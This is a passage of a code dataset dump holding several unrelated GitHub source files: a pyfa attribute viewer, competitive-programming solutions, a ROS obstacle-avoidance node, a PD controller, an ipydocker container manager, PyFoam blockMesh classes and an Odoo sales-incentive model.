self.UpdateList()\r\n event.Skip()\r\n\r\n def ToggleViewMode(self, event):\r\n self.toggleView *= -1\r\n self.UpdateList()\r\n event.Skip()\r\n\r\n def ExportItemStats(self, event):\r\n exportFileName = self.item.name + \" (\" + str(self.item.ID) + \").csv\"\r\n\r\n saveFileDialog = wx.FileDialog(self, \"Save CSV file\", \"\", exportFileName,\r\n \"CSV files (*.csv)|*.csv\", wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)\r\n\r\n if saveFileDialog.ShowModal() == wx.ID_CANCEL:\r\n return # the user hit cancel...\r\n\r\n with open(saveFileDialog.GetPath(), \"wb\") as exportFile:\r\n writer = csv.writer(exportFile, delimiter=',')\r\n\r\n writer.writerow(\r\n [\r\n \"ID\",\r\n \"Internal Name\",\r\n \"Friendly Name\",\r\n \"Modified Value\",\r\n \"Base Value\",\r\n ]\r\n )\r\n\r\n for attribute in self.attrValues:\r\n\r\n try:\r\n attribute_id = self.attrInfo[attribute].ID\r\n except (KeyError, AttributeError):\r\n attribute_id = ''\r\n\r\n try:\r\n attribute_name = self.attrInfo[attribute].name\r\n except (KeyError, AttributeError):\r\n attribute_name = attribute\r\n\r\n try:\r\n attribute_displayname = self.attrInfo[attribute].displayName\r\n except (KeyError, AttributeError):\r\n attribute_displayname = ''\r\n\r\n try:\r\n attribute_value = self.attrInfo[attribute].value\r\n except (KeyError, AttributeError):\r\n attribute_value = ''\r\n\r\n try:\r\n attribute_modified_value = self.attrValues[attribute].value\r\n except (KeyError, AttributeError):\r\n attribute_modified_value = self.attrValues[attribute]\r\n\r\n writer.writerow(\r\n [\r\n attribute_id,\r\n attribute_name,\r\n attribute_displayname,\r\n attribute_modified_value,\r\n attribute_value,\r\n ]\r\n )\r\n\r\n def PopulateList(self):\r\n self.paramList.InsertColumn(0, \"Attribute\")\r\n self.paramList.InsertColumn(1, \"Current Value\")\r\n if self.stuff is not None:\r\n self.paramList.InsertColumn(2, \"Base Value\")\r\n self.paramList.SetColumnWidth(0, 110)\r\n self.paramList.SetColumnWidth(1, 90)\r\n if self.stuff is not None:\r\n self.paramList.SetColumnWidth(2, 90)\r\n self.paramList.setResizeColumn(0)\r\n self.imageList = wx.ImageList(16, 16)\r\n self.paramList.SetImageList(self.imageList, wx.IMAGE_LIST_SMALL)\r\n\r\n names = list(self.attrValues.iterkeys())\r\n names.sort()\r\n\r\n idNameMap = {}\r\n idCount = 0\r\n for name in names:\r\n info = self.attrInfo.get(name)\r\n att = self.attrValues[name]\r\n\r\n valDefault = getattr(info, \"value\", None)\r\n valueDefault = valDefault if valDefault is not None else att\r\n\r\n val = getattr(att, \"value\", None)\r\n value = val if val is not None else att\r\n\r\n if info and info.displayName and self.toggleView == 1:\r\n attrName = info.displayName\r\n else:\r\n attrName = name\r\n\r\n if info and config.debug:\r\n attrName += \" ({})\".format(info.ID)\r\n\r\n if info:\r\n if info.icon is not None:\r\n iconFile = info.icon.iconFile\r\n icon = BitmapLoader.getBitmap(iconFile, \"icons\")\r\n\r\n if icon is None:\r\n icon = BitmapLoader.getBitmap(\"transparent16x16\", \"gui\")\r\n\r\n attrIcon = self.imageList.Add(icon)\r\n else:\r\n attrIcon = self.imageList.Add(BitmapLoader.getBitmap(\"7_15\", \"icons\"))\r\n else:\r\n attrIcon = self.imageList.Add(BitmapLoader.getBitmap(\"7_15\", \"icons\"))\r\n\r\n index = self.paramList.InsertImageStringItem(sys.maxint, attrName, attrIcon)\r\n idNameMap[idCount] = attrName\r\n self.paramList.SetItemData(index, idCount)\r\n idCount += 1\r\n\r\n if self.toggleView != 1:\r\n valueUnit = str(value)\r\n elif info and info.unit:\r\n valueUnit = self.TranslateValueUnit(value, info.unit.displayName, info.unit.name)\r\n else:\r\n valueUnit = formatAmount(value, 3, 0, 0)\r\n\r\n if self.toggleView != 1:\r\n valueUnitDefault = str(valueDefault)\r\n elif info and info.unit:\r\n valueUnitDefault = self.TranslateValueUnit(valueDefault, info.unit.displayName, info.unit.name)\r\n else:\r\n valueUnitDefault = formatAmount(valueDefault, 3, 0, 0)\r\n\r\n self.paramList.SetStringItem(index, 1, valueUnit)\r\n if self.stuff is not None:\r\n self.paramList.SetStringItem(index, 2, valueUnitDefault)\r\n\r\n self.paramList.SortItems(lambda id1, id2: cmp(idNameMap[id1], idNameMap[id2]))\r\n self.paramList.RefreshRows()\r\n self.totalAttrsLabel.SetLabel(\"%d attributes. \" % idCount)\r\n self.Layout()\r\n\r\n @staticmethod\r\n def TranslateValueUnit(value, unitName, unitDisplayName):\r\n def itemIDCallback():\r\n item = Market.getInstance().getItem(value)\r\n return \"%s (%d)\" % (item.name, value) if item is not None else str(value)\r\n\r\n def groupIDCallback():\r\n group = Market.getInstance().getGroup(value)\r\n return \"%s (%d)\" % (group.name, value) if group is not None else str(value)\r\n\r\n def attributeIDCallback():\r\n if not value: # some attributes come through with a value of 0? See #1387\r\n return \"%d\" % (value)\r\n attribute = Attribute.getInstance().getAttributeInfo(value)\r\n return \"%s (%d)\" % (attribute.name.capitalize(), value)\r\n\r\n trans = {\r\n \"Inverse Absolute Percent\" : (lambda: (1 - value) * 100, unitName),\r\n \"Inversed Modifier Percent\": (lambda: (1 - value) * 100, unitName),\r\n \"Modifier Percent\" : (\r\n lambda: (\"%+.2f\" if ((value - 1) * 100) % 1 else \"%+d\") % ((value - 1) * 100), unitName),\r\n \"Volume\" : (lambda: value, u\"m\\u00B3\"),\r\n \"Sizeclass\" : (lambda: value, \"\"),\r\n \"Absolute Percent\" : (lambda: (value * 100), unitName),\r\n \"Milliseconds\" : (lambda: value / 1000.0, unitName),\r\n \"typeID\" : (itemIDCallback, \"\"),\r\n \"groupID\" : (groupIDCallback, \"\"),\r\n \"attributeID\" : (attributeIDCallback, \"\")\r\n }\r\n\r\n override = trans.get(unitDisplayName)\r\n if override is not None:\r\n v = override[0]()\r\n if isinstance(v, str):\r\n fvalue = v\r\n elif isinstance(v, (int, float, long)):\r\n fvalue = formatAmount(v, 3, 0, 0)\r\n else:\r\n fvalue = v\r\n return \"%s %s\" % (fvalue, override[1])\r\n else:\r\n return \"%s %s\" % (formatAmount(value, 3, 0), unitName)\r\n","repo_name":"Bloodysigg/pyfa","sub_path":"gui/builtinItemStatsViews/itemAttributes.py","file_name":"itemAttributes.py","file_ext":"py","file_size_in_byte":11035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70171110633","text":"class Solution:\n def minWindow(self, s: str, t: str) -> str:\n memory, left, res = collections.defaultdict(int), 0, [0, sys.maxsize]\n cur_size = 0\n \n for char in t:\n memory[char] += 1\n\n for right, cur_char in enumerate(s):\n if cur_char in memory:\n memory[cur_char] -= 1\n\n if memory[cur_char] == 0:\n cur_size += 1\n \n while cur_size == len(memory):\n cur_len = right - left\n prev_len = res[1] - res[0]\n\n if cur_len < prev_len:\n res[0] = left\n res[1] = right\n \n left_char = s[left]\n if left_char in memory:\n if memory[left_char] == 0:\n cur_size -= 1\n memory[left_char] += 1\n left += 1\n \n if res[1] == sys.maxsize:\n return \"\"\n \n return s[res[0]:res[1] + 1]","repo_name":"IhorPeresunko/YouTube","sub_path":"leetcode/76.py","file_name":"76.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2489144898","text":"#!/usr/bin/env python3\nimport rospy\nfrom loa_bot.msg import Obstacle\nfrom geometry_msgs.msg import Twist\n\n# Callback method for the obstacle_detector subscriber\ndef obstacle_avoidace(Obstacle: Obstacle):\n \n # Output obstacle info to console\n rospy.loginfo(\"Obstacle distance: \" + str(Obstacle.distance) + \"m\")\n rospy.loginfo(\"Obstable angle: \" + str(Obstacle.angle) + \" degrees\")\n\n # Continue traveling forward if object further than 0.25m\n if (Obstacle.distance > 0.25):\n cmd_vel_msg.linear.x = 0.15\n cmd_vel_msg.angular.z = 0.0\n\n # If the object is less than 0.25m away, stop moving forward and rotate until the object is behind the robot\n elif (Obstacle.distance <= 0.25):\n if (Obstacle.angle > 90 and Obstacle.angle < 270): # Checks if object is behind\n cmd_vel_msg.linear.x = 0.15\n cmd_vel_msg.angular.z = 0.0\n \n if (Obstacle.angle >= 0 and Obstacle.angle < 90): # Check if the object is to the left of the robot\n cmd_vel_msg.linear.x = 0.0\n cmd_vel_msg.angular.z = -1\n\n if (Obstacle.angle > 270 and Obstacle.angle < 360): # Check if the object is to the right of the robot\n cmd_vel_msg.linear.x = 0.0\n cmd_vel_msg.angular.z = 1\n \n cmd_vel_pub.publish(cmd_vel_msg) # Publish the updated velocity commands\n \n\nif __name__ == \"__main__\":\n try:\n rospy.init_node(\"roaming_controller\")\n rospy.loginfo(\"roaming_controller node is activated\")\n \n cmd_vel_pub = rospy.Publisher('cmd_vel', Twist, queue_size=10)\n obstacle_sub = rospy.Subscriber('obstacle_data', Obstacle, callback=obstacle_avoidace)\n \n cmd_vel_msg = Twist()\n \n rospy.spin()\n except rospy.ROSInterruptException:\n pass","repo_name":"MunninZ/LiDAR-Obstacle-Avoidance-Robot","sub_path":"scripts/roaming_controller.py","file_name":"roaming_controller.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15068970249","text":"n, m = map(int,input().split())\r\n\r\na = [0] * m\r\nb = [0] * m\r\nc = [0] * m\r\n\r\nfor i in range(0,m):\r\n a[i], b[i], c[i] = map(int,input().split())\r\n a[i] = a[i] - 1\r\n b[i] = b[i] - 1\r\n c[i] = -c[i]\r\n\r\nINF = (n-1) * max(abs(min(c)),abs(max(c)))\r\n\r\ndist = [INF] * n\r\n\r\ndist[0] = 0\r\n\r\nfor j in range(0,n-1):\r\n for i in range(0,m):\r\n if dist[a[i]] == INF:\r\n continue\r\n dist[b[i]] = min(dist[b[i]], dist[a[i]] + c[i])\r\n\r\nans = - dist[n-1]\r\n\r\nnegative = [False] * n\r\n\r\nfor j in range(0,n):\r\n for i in range(0,m):\r\n if dist[a[i]] == INF:\r\n continue\r\n if negative[a[i]]:\r\n negative[b[i]] = True\r\n elif dist[a[i]] + c[i] < dist[b[i]]:\r\n dist[b[i]] = dist[a[i]] + c[i]\r\n negative[b[i]] = True\r\n\r\nif negative[n-1]:\r\n print(\"inf\")\r\nelse:\r\n print(ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc061/D/4724112.py","file_name":"4724112.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"21578713849","text":"import time\n\nclass pd_controller:\n\n def __init__(self, setpoint = 1, kp = 1, kd = 1, derivative_samples = 3):\n self.setpoint = setpoint\n self._der = 0\n self.kp = kp\n self.kd = kd\n self.derivative_samples = 4\n self._curtime = time.time()\n self._history = [0 for i in range(self.derivative_samples)]\n self._history_times = [0 for i in range(self.derivative_samples)]\n\n\n def _calc_der(self):\n self._der = 0\n c = 0\n for i in range(len(self._history)-1):\n for j in range(i + 1, len(self._history)):\n if self._history_times[j] > self._history_times[i]:\n self._der += self._history[j] - self._history[i]\n c+=1\n self._der /= float(c)\n\n\n def pd_out(self, out):\n self._history.pop(0)\n self._history.append(out - self.setpoint)\n self._history_times.pop(0)\n self._history_times.append(time.time())\n self._calc_der()\n return self.kp*self._history[-1] + self.kd*self._der\n\n def reset(self, sp):\n self.setpoint = sp\n self._der = 0\n self._curtime = time.time()\n self._history = [0 for i in range(self.derivative_samples)]\n self._history_times = [0 for i in range(self.derivative_samples)]\n\n\nif __name__ == \"__main__\":\n from matplotlib import pyplot as plt\n mypd = pd_controller(kp = 0.01, kd = 5)\n t = [i for i in range(3000)]\n x = [0]\n dt = 0.001\n err = 0.1\n vel = 0\n for i in t[1:]:\n out = mypd.pd_out(x[-1])\n vel += out\n x.append(x[-1] + vel*dt)\n time.sleep(dt)\n plt.plot(t,x)\n plt.show()\n","repo_name":"ABakirtzis/RoboticsProject","sub_path":"wall_following/scripts/pdcon.py","file_name":"pdcon.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12243249075","text":"# Em Python lambdas são como funções anônimas.\n\npurchase = (\n {'quantity': 2, 'price': 10},\n {'quantity': 3, 'price': 20},\n {'quantity': 5, 'price': 30},\n)\n\n\n# traditional method\ndef calc_price_total(purch): return purch['quantity'] * purch['price']\n\n\ntotals = tuple(map(calc_price_total, purchase))\n\n# with lambda\ntotals_lambda = tuple(\n map(lambda purch: purch['quantity'] * purch['price'], purchase))\n\nprint(totals_lambda) # (20, 60, 150)\nprint(sum(totals_lambda)) # 230\n","repo_name":"lucas-silveira/python-fundamentals","sub_path":"Advanced Functions/lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18667154774","text":"import ipywidgets as widgets\nimport docker\nfrom traitlets import Dict, List, observe, Unicode\n\n@widgets.register\nclass DockerManager(widgets.DOMWidget):\n\n \"\"\"\"\"\"\n _view_name = Unicode('DockerView').tag(sync=True)\n _model_name = Unicode('DockerModel').tag(sync=True)\n _view_module = Unicode('ipydocker').tag(sync=True)\n _model_module = Unicode('ipydocker').tag(sync=True)\n _view_module_version = Unicode('^0.1.0').tag(sync=True)\n _model_module_version = Unicode('^0.1.0').tag(sync=True)\n\n _cli = docker.APIClient(base_url='unix:///var/run/docker.sock')\n # docker_version = Unicode(_cli.version()['Version']).tag(sync=True)\n docker_info = Dict().tag(sync=True)\n command = Unicode('').tag(sync=True)\n containers = List().tag(sync=True)\n images = List().tag(sync=True)\n parameters = Dict().tag(sync=True)\n\n @observe(\"command\")\n def _on_command_change(self, changed):\n self.command = changed['new']\n if self.command == 'ps':\n self.containers = []\n self.containers = self._cli.containers()\n elif self.command == 'images':\n self.images = []\n self.images = self._cli.images()\n elif self.command == 'create':\n self._create_container()\n elif self.command == 'remove':\n self._remove_container()\n elif self.command == 'info':\n self.docker_info = self._cli.info()\n\n def _create_container(self):\n volumes = {'/var/run/docker.sock': '/var/run/docker.sock',\n self.parameters['host']: self.parameters['container']}\n ports = {int(self.parameters['internal']): int(self.parameters['external'])}\n\n binds = []\n for s, d in volumes.items():\n binds.append(s + \":\" + d)\n volumes = list(volumes.values())\n\n port_bindings = {}\n for i, e in ports.items():\n port_bindings[i] = e\n ports = list(ports.keys())\n\n host_config = self._cli.create_host_config(binds=binds, port_bindings=port_bindings)\n\n commands = ''\n if self.parameters['command']: \n commands = 'bash -c \"' + self.parameters['command'] + '\"'\n\n _containerId = self._cli.create_container(image=self.parameters['image'],\n volumes=volumes,\n ports=ports,\n command=commands,\n host_config=host_config)\n\n self._cli.start(_containerId)\n self.containers = []\n self.containers = self._cli.containers()\n\n def _remove_container(self):\n if self.parameters['containerId']:\n self._cli.stop(self.parameters['containerId'])\n try:\n self._cli.remove_container(self.parameters['containerId'], force=True)\n except:\n pass\n \n self.containers = []\n self.containers = self._cli.containers()\n","repo_name":"JMHOO/nbdocker","sub_path":"ipydocker/ipydocker/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70145791272","text":"repolist = []\nfrom req import GithubRequester\ndef getallrepo(token):\n x = 1\n rep = GithubRequester()\n while rep.rest_request(\"GET\", \"https://api.github.com/orgs/performgroup/repos?page={}&per_page=50\".format(x), token) != []:\n responses = rep.rest_request(\"GET\", \"https://api.github.com/orgs/performgroup/repos?page={}&per_page=50\".format(x), token)\n for i in range (len(responses)):\n if (responses[i]['size']) == 0:\n print(\"empty repo\")\n print (responses[i]['name'])\n else:\n repolist.append(responses[i]['name'])\n x=x+1\n print(repolist)\n print(len(repolist))\n\n","repo_name":"rexius41/test_ness","sub_path":"allrep.py","file_name":"allrep.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15149753639","text":"#!/usr/bin/env python3\n\nimport datetime\n\ndef main():\n n = int(input())\n md = []\n for i in range(n):\n m, d = map(int, input().split(\"/\"))\n md.append((m, d))\n md = sorted(md)\n\n stored = 0\n streak = 0\n ma_streak = 0\n dt = datetime.datetime(2012, 1, 1) - datetime.timedelta(1)\n for i in range(366):\n dt += datetime.timedelta(1)\n is_holiday = (dt.month, dt.day) in md\n is_yasumi, stored = advance(dt, stored, is_holiday)\n if is_yasumi:\n streak += 1\n ma_streak = max(ma_streak, streak)\n else:\n streak = 0\n\n print(ma_streak)\n\ndef advance(today, stored, is_holiday):\n if is_weekend(today):\n stored += 1\n if is_holiday:\n stored += 1\n if stored > 0:\n is_yasumi = True\n stored -= 1\n else:\n is_yasumi = False\n return is_yasumi, stored\n\ndef is_weekend(today):\n return today.weekday() in [5, 6]\n\nmain()","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc010/B/3305445.py","file_name":"3305445.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"73285149353","text":"\"\"\"Building blocks for a blockMeshDict\"\"\"\n\nimport re,os\nimport copy\nimport math\nfrom PyFoam.Basics.LineReader import LineReader\nfrom PyFoam.RunDictionary.FileBasis import FileBasisBackup\nfrom PyFoam.RunDictionary.BlockMesh import BlockMesh\nfrom PyFoam.RunDictionary.ParsedBlockMeshDict import ParsedBlockMeshDict\nfrom PyFoam.Basics.DataStructures import *\nfrom math import ceil\nfrom PyFoam.Error import error\n\nclass BlockMeshComponent(object):\n def __init__(self, dimension):\n self.dimension=dimension\n\nclass BlockMeshEdge(BlockMeshComponent):\n def __init__(self, start, end, center, points):\n self.start=start\n self.end=end\n self.center=center\n self.points=copy.deepcopy(points)\n if(center==None and points!=None):\n self.edgeType='spline'\n else:\n self.edgeType='arc'\n\n def __repr__(self):\n result=\"\"\n if self.edgeType=='spline':\n result='\\t'+\"spline\"+' '+str(self.start)+' '+str(self.end)+\"\\n\\t(\"\n for point in self.points:\n result+='\\n\\t\\t\\t'+\"(\"+' '.join(str(n) for n in point)+ \")\"\n result+='\\n\\t'+\")\"\n elif self.edgeType=='arc':\n result='\\t'+\"arc\"+' '+str(self.start)+' '+str(self.end)+\" (\"+' '.join(str(n) for n in self.center)+ \")\"\n return result\n def __str__(self):\n result=\"\"\n if self.edgeType=='spline':\n result='\\t'+\"spline\"+' '+str(self.start)+' '+str(self.end)+\"\\n\\t(\"\n for point in self.points:\n result+='\\n\\t\\t\\t'+str(point)\n result+='\\n\\t'+\")\"\n elif self.edgeType=='arc':\n result='\\t'+\"arc\"+' '+str(self.start)+' '+str(self.end)+' '+str(self.center)\n return result\n\nclass BlockMeshBoundary(BlockMeshComponent):\n def __init__(self, name, boundaryType, faces):\n self.name=name\n self.boundaryType=boundaryType\n self.faces=faces\n\n def __repr__(self):\n result='\\t'+self.name+'\\n\\t'+\"{\"+'\\n\\t\\t'+\"type \"+self.boundaryType+\";\"+'\\n\\t\\t'+\"faces\"+\"\\n\\t\\t(\"\n for face in self.faces:\n result+='\\n\\t\\t\\t'+\"(\"+' '.join(str(n) for n in face)+ \")\"\n result+='\\n\\t\\t'+\");\"+\"\\n\\t}\"\n return result\n def __str__(self):\n result='\\t'+self.name+'\\n\\t'+\"{\"+'\\n\\t\\t'+\"type \"+self.boundaryType+\";\"+'\\n\\t\\t'+\"faces\"+\"\\n\\t\\t(\"\n for face in self.faces:\n result+='\\n\\t\\t\\t'+\"(\"+' '.join(str(n) for n in face)+ \")\"\n result+='\\n\\t\\t'+\");\"+\"\\n\\t}\"\n return result\n\nclass BlockMeshVertex(BlockMeshComponent):\n def __init__(self,origin,coordinates):\n self.coordinates=coordinates\n self.origin=origin\n if(len(self.coordinates) is 2):\n self.dimension=2\n elif(len(coordinates) is 3):\n self.dimension=3\n else:\n self.dimension=None\n\n def extend(self,extensionType,value):\n newvertex=deepcopy(self)\n if(extensionType is \"EXTRUDE\"):\n newvertex.coordinates.append(value)\n elif(extensionType is \"ROTATEY\"):\n newvertex.coordinates.append(\n abs(self.coordinates[0]-self.origin[0])\n *\n math.sin(math.radians(value)))\n elif(extensionType is \"ROTATEX\"):\n newvertex.coordinates.append(\n abs(self.coordinates[1]-self.origin[1])\n *\n math.sin(math.radians(value)))\n return newvertex\n def __str__(self):\n result=\"(\"+' '.join(str(n) for n in self.coordinates)+ \")\"\n return result\n","repo_name":"nextfoam/baram","sub_path":"PyFoam/Basics/BlockMeshComponents.py","file_name":"BlockMeshComponents.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"} +{"seq_id":"41844272605","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime, timedelta\nfrom odoo import models, fields, api\nfrom odoo import exceptions\n\ndef get_years():\n year_list = []\n for i in range(2016, 2036):\n year_list.append((i, str(i)))\n return year_list\n\n\nclass SaleIncentive(models.Model):\n _name = 'sale.incentive'\n _description = \"Sale Incentive\"\n\n name = fields.Char(string=\"Incentive Name\", readonly=True, required=True, copy=False, default='New')\n region = fields.Many2one('region.incentive', string=\"Region\")\n seller = fields.Many2one('res.partner', string=\"Seller\")\n supervisor = fields.Many2one('res.partner', string=\"Supervisor\")\n partner_id = fields.Many2one('res.partner', string='Customer', readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, required=True, change_default=True, index=True, track_visibility='always', track_sequence=1, help=\"You can find a customer by its Name, TIN, Email or Internal Reference.\")\n company_id = fields.Many2one('res.company', 'Company', default=lambda self: self.env['res.company']._company_default_get('sale.incentive'))\n user_id = fields.Many2one('res.users', string='Salesperson', index=True, track_visibility='onchange', track_sequence=2, default=lambda self: self.env.user)\n sequence_id = fields.Many2one('ir.sequence',\n required=True,\n )\n is_supervisor = fields.Boolean()\n is_seller = fields.Boolean()\n total_region = fields.Many2many('res.country', string=\"Total region\")\n month = fields.Selection([(1, 'January'), (2, 'February'), (3, 'March'), (4, 'April'),\n (5, 'May'), (6, 'June'), (7, 'July'), (8, 'August'),\n (9, 'September'), (10, 'October'), (11, 'November'), (12, 'December')], string='Month')\n year = fields.Selection(get_years(), string='Year')\n maximum_bonus = fields.Many2one('sale.bonuses', string=\"Maximum Bonus\") # Bono Maximo\n brand_line_objectives_ids = fields.One2many('brand.objectives', \"sale_incentive_id\",\n string=\"Brand Lines with Objectives\")\n state = fields.Selection(\n [('incentive_reg', 'Incentive Registration'),\n ('incentive_sent', 'Incentive Sent'),\n ('incentive_approved', 'Incentive Approved'),\n ('incentive_cancel', 'Incentive Cancelled'),\n ], string='State', default='incentive_reg')\n\n month_year = fields.Char(string='Month/Year', compute='_compute_month_year', stored=True)\n\n brands_objective = fields.Integer(string=\"N° Brands with Objectives\")\n bonus_x_boxes = fields.Many2one('sale.bonuses', string='Bonus for Boxes')\n bonus_x_bs = fields.Many2one('sale.bonuses', string='Bonus for Bs')\n bonus_x_qualitative = fields.Many2one('sale.bonuses', string='Bonus for Qualitative')\n bonus_brand_boxes = fields.Float(string='Bonus for Box Brands', digits=(12, 6))\n maximum_charge = fields.Float(string='Maximum % To Charge', digits=(12, 6))\n\n bonus_x_boxes_total = fields.Float()\n bonus_x_bs_total = fields.Float()\n bonus_x_qualitative_total = fields.Float()\n\n total_cupor_for_boxes = fields.Float(string=\"Total Coupon for boxes\") # Total Cupor by box\n total_space_in_bs = fields.Float(string=\"Total Coupon in Bs\") # Total Cupo in Bs\n total_sale_by_box = fields.Float(string=\"Total Sale by Boxes\") # Total Sales by Box\n total_sale_in_bs = fields.Float(string=\"Total Sale in Bs.\") # Total Sales in BS\n total_charged_by_box = fields.Float(string=\"Total Charge by Box.\") # Total Charge by Box\n\n achievement_percent = fields.Float(string=\"% Achievement\")\n achievement_to_collect_percent = fields.Float(string=\"% Achievement to Collet\")\n incentive_bs = fields.Float(string=\"Incentive in BS\")\n incentive_x_box = fields.Float(string=\"Incentive by Box\")\n total_incentive = fields.Float(string=\"Total Incentive\")\n approved_date = fields.Datetime(string='Approved Date', readonly=True, index=True, help=\"Date on which the incentive is confirmed.\", copy=False)\n \n @api.onchange('supervisor')\n def _is_supervisor(self):\n if self.supervisor:\n self.is_supervisor = True\n self.partner_id = self.supervisor\n \n @api.onchange('seller')\n def _is_seller(self):\n if self.seller:\n self.is_seller = True\n self.partner_id = self.seller\n\n @api.onchange('brand_line_objectives_ids')\n def count(self):\n bo = len(self.mapped('brand_line_objectives_ids'))\n self.brands_objective = bo\n\n @api.depends('month','year')\n def _compute_month_year(self):\n for rec in self:\n month_sel = dict(rec._fields['month'].selection).get(rec.month)\n year_sel = rec.year\n\n if(month_sel and year_sel):\n rec.month_year = f\"{month_sel} {year_sel}\"\n elif(month):\n rec.month_year = f\"{month_sel}\"\n else:\n rec.month_year = f\"{year_sel}\"\n \n @api.onchange('bonus_x_boxes')\n def calc_bonus_x_boxes_total(self):\n mb = self.maximum_bonus.amount\n amount = self.bonus_x_boxes.amount/100\n\n if(mb == 0 and amount > 0):\n return{\n 'warning':{\n 'title':'Maximum Bonus not typed',\n 'message':'Maximum Bonus must be typed'\n }\n }\n else:\n self.bonus_x_boxes_total = mb * amount\n \n @api.onchange('bonus_x_bs')\n def calc_bonus_x_bs_total(self):\n mb = self.maximum_bonus.amount\n amount = self.bonus_x_bs.amount/100\n\n if(mb == 0 and amount > 0):\n return{\n 'warning':{\n 'title':'Maximum Bonus not typed',\n 'message':'Maximum Bonus must be typed'\n }\n }\n else:\n self.bonus_x_bs_total = mb * amount\n\n @api.onchange('bonus_x_qualitative')\n def calc_bonus_x_qualitative_total(self):\n mb = self.maximum_bonus.amount\n amount = self.bonus_x_qualitative.amount/100\n\n if(mb == 0 and amount > 0):\n return{\n 'warning':{\n 'title':'Maximum Bonus not typed',\n 'message':'Maximum Bonus must be typed'\n }\n }\n else:\n self.bonus_x_qualitative_total = mb * amount\n\n @api.onchange('brand_line_objectives_ids')\n def calc_bonus_brand_boxes(self):\n if len(self.mapped('brand_line_objectives_ids')) > 0:\n if self.brands_objective > 0:\n self.bonus_brand_boxes = self.maximum_bonus.amount/self.brands_objective\n \n\n @api.onchange('brand_line_objectives_ids')\n def totals_lines_objectives(self):\n if len(self.mapped('brand_line_objectives_ids')) > 0:\n for rec in self.mapped('brand_line_objectives_ids'):\n self.total_cupor_for_boxes = self.total_cupor_for_boxes + rec.cupor_for_boxes\n self.total_space_in_bs = self.total_space_in_bs + rec.space_in_bs\n self.total_sale_by_box = self.total_sale_by_box + rec.sale_by_box\n self.total_sale_in_bs = self.total_sale_in_bs + rec.sale_in_bs\n self.total_charged_by_box = self.total_charged_by_box + rec.charged_for_box\n\n if self.total_space_in_bs > 0:\n self.achievement_percent = self.total_sale_in_bs/(self.total_space_in_bs * 100)\n self.achievement_to_collect_percent = self.achievement_percent\n\n self.incentive_bs = self.achievement_to_collect_percent * self.bonus_x_bs_total\n self.incentive_x_box = self.total_charged_by_box\n self.total_incentive = self.incentive_bs + self.incentive_x_box\n\n @api.multi\n def action_cancel(self):\n return self.write({'state': 'incentive_sent'})\n\n @api.multi\n def action_confirm(self):\n if self._get_forbidden_state_confirm() & set(self.mapped('state')):\n raise UserError(_(\n 'It is not allowed to confirm an incentive in the following states: %s'\n ) % (', '.join(self._get_forbidden_state_confirm())))\n\n self.write({\n 'state': 'incentive_approved',\n 'approved_date': fields.Datetime.now()\n })\n\n # Context key 'default_name' is sometimes propagated up to here.\n # We don't need it and it creates issues in the creation of linked records.\n context = self._context.copy()\n context.pop('default_name', None)\n\n self.with_context(context)._action_confirm()\n if self.env['ir.config_parameter'].sudo().get_param('sale.auto_done_setting'):\n self.action_done()\n return True\n\n def _get_forbidden_state_confirm(self):\n return {'incentive_cancel'}\n \n @api.multi\n def print_incentive(self):\n return self.env.ref('sales_modification.action_incentive_report')\\\n .with_context(discard_logo_check=True).report_action(self)\n\n @api.multi\n def action_incentive_send(self):\n self.ensure_one()\n ir_model_data = self.env['ir.model.data']\n try:\n template_id = ir_model_data.get_object_reference('sales_modification', 'sale_incentive_email_template')[1]\n except ValueError:\n template_id = False\n try:\n compose_form_id = ir_model_data.get_object_reference('mail', 'email_compose_message_wizard_form')[1]\n except ValueError:\n compose_form_id = False\n lang = self.env.context.get('lang')\n template = template_id and self.env['mail.template'].browse(template_id)\n if template and template.lang:\n lang = template._render_template(template.lang, 'sale.incentive', self.ids[0])\n ctx = {\n 'default_model': 'sale.incentive',\n 'default_res_id': self.ids[0],\n 'default_use_template': bool(template_id),\n 'default_template_id': template_id,\n 'default_composition_mode': 'comment',\n 'mark_so_as_sent': True,\n 'model_description': self.with_context(lang=lang)._description,\n 'custom_layout': \"mail.mail_notification_paynow\",\n 'proforma': self.env.context.get('proforma', False),\n 'force_email': True\n }\n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': 'mail.compose.message',\n 'views': [(compose_form_id, 'form')],\n 'view_id': compose_form_id,\n 'target': 'new',\n 'context': ctx,\n }\n\n @api.multi\n @api.returns('mail.message', lambda value: value.id)\n def message_post(self, **kwargs):\n if self.env.context.get('mark_so_as_sent'):\n self.filtered(lambda o: o.state == 'draft').with_context(tracking_disable=True).write({'state': 'incentive_sent'})\n self.env.user.company_id.set_onboarding_step_done('sale_onboarding_sample_quotation_state')\n return super(SaleIncentive, self.with_context(mail_post_autofollow=True)).message_post(**kwargs)\n\n @api.model\n def create(self, 